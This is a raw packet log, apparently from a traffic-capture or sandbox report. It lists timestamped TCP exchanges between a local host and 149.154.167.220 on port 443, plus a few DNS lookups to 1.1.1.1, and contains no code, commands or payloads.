Mar 14, 2025 14:22:29.445022106 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445029974 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.445084095 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445087910 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.445158958 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445167065 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.445231915 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445246935 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.445384979 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445394039 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.445450068 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445456982 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.445569992 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445579052 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.445658922 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445674896 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.445722103 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445730925 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.445807934 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445823908 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.445879936 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445887089 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.445939064 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.445949078 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.446858883 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.446877003 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.446938038 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.446945906 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.447006941 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.447014093 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.454334021 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.454344034 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.454466105 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.454479933 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.454585075 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.454591990 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.454907894 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.454916000 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.455151081 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.455157995 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.455238104 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.455244064 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.455292940 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.455301046 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.455363989 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.455379009 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.455415010 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.455421925 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.455673933 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.455682039 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.455853939 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.455862045 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.455981016 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.455986023 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.456056118 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.456063986 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.456156015 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.456161022 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.456228971 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.456235886 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.456403971 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.456412077 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.456511974 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.456526995 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.456603050 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.456614971 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.456677914 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.456684113 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.456739902 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.456748009 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.456806898 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.456813097 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.456861973 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.456870079 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.457046986 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.457053900 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.457189083 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.457195997 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.457326889 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.457339048 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.457427979 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.457434893 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.457490921 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.457509041 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.457663059 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.457669020 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.457779884 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.457787991 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.457840919 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.457845926 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.457900047 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.457920074 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.457957983 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.457964897 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.458036900 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.458048105 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.458107948 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.458120108 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.458184004 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.458190918 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.458240032 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.458245993 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.458298922 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.458303928 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.458342075 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.458348036 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.458483934 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.458499908 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.458564043 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.458570957 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.458770037 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.458781004 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.458894968 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.458901882 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.458959103 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.458969116 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.459007978 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.459013939 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.459275007 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.459283113 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.459331036 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.459337950 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.459386110 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.459389925 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.459445000 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.459450960 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.459491014 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.459500074 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.459553003 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.459559917 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.459698915 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.459716082 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.459745884 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.459753036 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.459904909 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.459913015 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.460014105 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.460021019 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.460094929 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.460102081 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.460175037 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.460180998 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.460242987 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.460248947 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.460494041 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.460522890 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.460571051 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.460582972 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.460604906 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.460618019 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.460673094 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.460679054 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.460732937 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.460742950 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.460788012 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.460802078 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.460839987 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.460851908 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.461090088 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.461098909 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.461174965 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.461189985 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.461252928 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.461261034 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.461361885 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.461369038 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.461447001 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.461457968 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.461534023 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.461550951 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.461580038 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.461586952 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.461643934 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.461656094 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.461896896 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.461905003 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.461954117 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.461961985 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.462006092 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.462016106 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.462068081 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.462074041 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.462122917 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.462127924 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.462184906 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.462189913 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.462338924 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.462348938 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.462454081 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.462460995 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.462553024 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.462574005 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.462605000 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.462610960 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.462687016 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.462693930 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.462759972 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.462765932 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.462805033 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.462810993 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.463046074 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.463052988 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.463115931 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.463125944 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.463167906 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.463171959 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.463224888 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.463229895 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.463288069 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.463293076 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.463475943 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.463484049 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.463613987 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.463624954 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.463738918 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.463746071 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.463797092 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.463803053 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.463921070 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.463927984 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.463989019 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.463995934 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464040041 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464046001 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464112043 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464118958 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464155912 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464162111 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464211941 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464216948 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464271069 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464277029 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464330912 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464335918 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464396954 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464402914 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464461088 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464466095 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464519024 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464525938 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464586020 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464592934 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464654922 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464659929 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464694023 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464701891 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464752913 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464759111 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464806080 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464812994 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464864016 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464869022 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464915037 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464921951 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.464968920 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.464977026 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.465158939 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.465167046 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.465208054 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.465214968 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.465336084 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.465343952 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.465482950 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.465491056 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.465555906 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.465563059 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.465627909 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.465641975 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.465714931 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.465720892 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.465760946 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.465769053 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.465823889 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.465828896 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466095924 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466106892 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466152906 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466160059 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466206074 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466223001 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466249943 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466257095 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466320992 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466331005 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466360092 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466367006 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466429949 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466447115 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466636896 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466643095 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466727018 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466739893 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466793060 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466799974 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466927052 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466944933 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.466976881 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.466984034 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467035055 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467044115 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467106104 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467113972 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467149973 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467155933 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467259884 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467267990 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467370987 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467380047 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467437983 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467446089 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467508078 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467513084 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467569113 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467575073 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467631102 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467638016 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467680931 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467685938 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467761993 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467767954 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:29.467925072 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:29.467952013 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:30.398226023 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:30.398416996 CET	443	49699	149.154.167.220	192.168.2.7
Mar 14, 2025 14:22:30.398502111 CET	49699	443	192.168.2.7	149.154.167.220
Mar 14, 2025 14:22:30.399682999 CET	49699	443	192.168.2.7	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2025 14:22:12.502258062 CET	50695	53	192.168.2.7	1.1.1.1
Mar 14, 2025 14:22:12.509372950 CET	53	50695	1.1.1.1	192.168.2.7
Mar 14, 2025 14:22:15.285576105 CET	55132	53	192.168.2.7	1.1.1.1
Mar 14, 2025 14:22:15.295239925 CET	53	55132	1.1.1.1	192.168.2.7
Mar 14, 2025 14:22:21.369774103 CET	62040	53	192.168.2.7	1.1.1.1
Mar 14, 2025 14:22:21.376451015 CET	53	62040	1.1.1.1	192.168.2.7
Mar 14, 2025 14:22:24.365087986 CET	53	56266	1.1.1.1	192.168.2.7
Mar 14, 2025 14:22:24.418315887 CET	53	61913	1.1.1.1	192.168.2.7
Mar 14, 2025 14:22:24.690325975 CET	55502	53	192.168.2.7	1.1.1.1
Mar 14, 2025 14:22:24.690510988 CET	58668	53	192.168.2.7	1.1.1.1
Mar 14, 2025 14:22:24.696922064 CET	53	58668	1.1.1.1	192.168.2.7
Mar 14, 2025 14:22:24.697097063 CET	53	55502	1.1.1.1	192.168.2.7
Mar 14, 2025 14:22:26.285267115 CET	53	57354	1.1.1.1	192.168.2.7
Mar 14, 2025 14:22:26.631831884 CET	53	61761	1.1.1.1	192.168.2.7
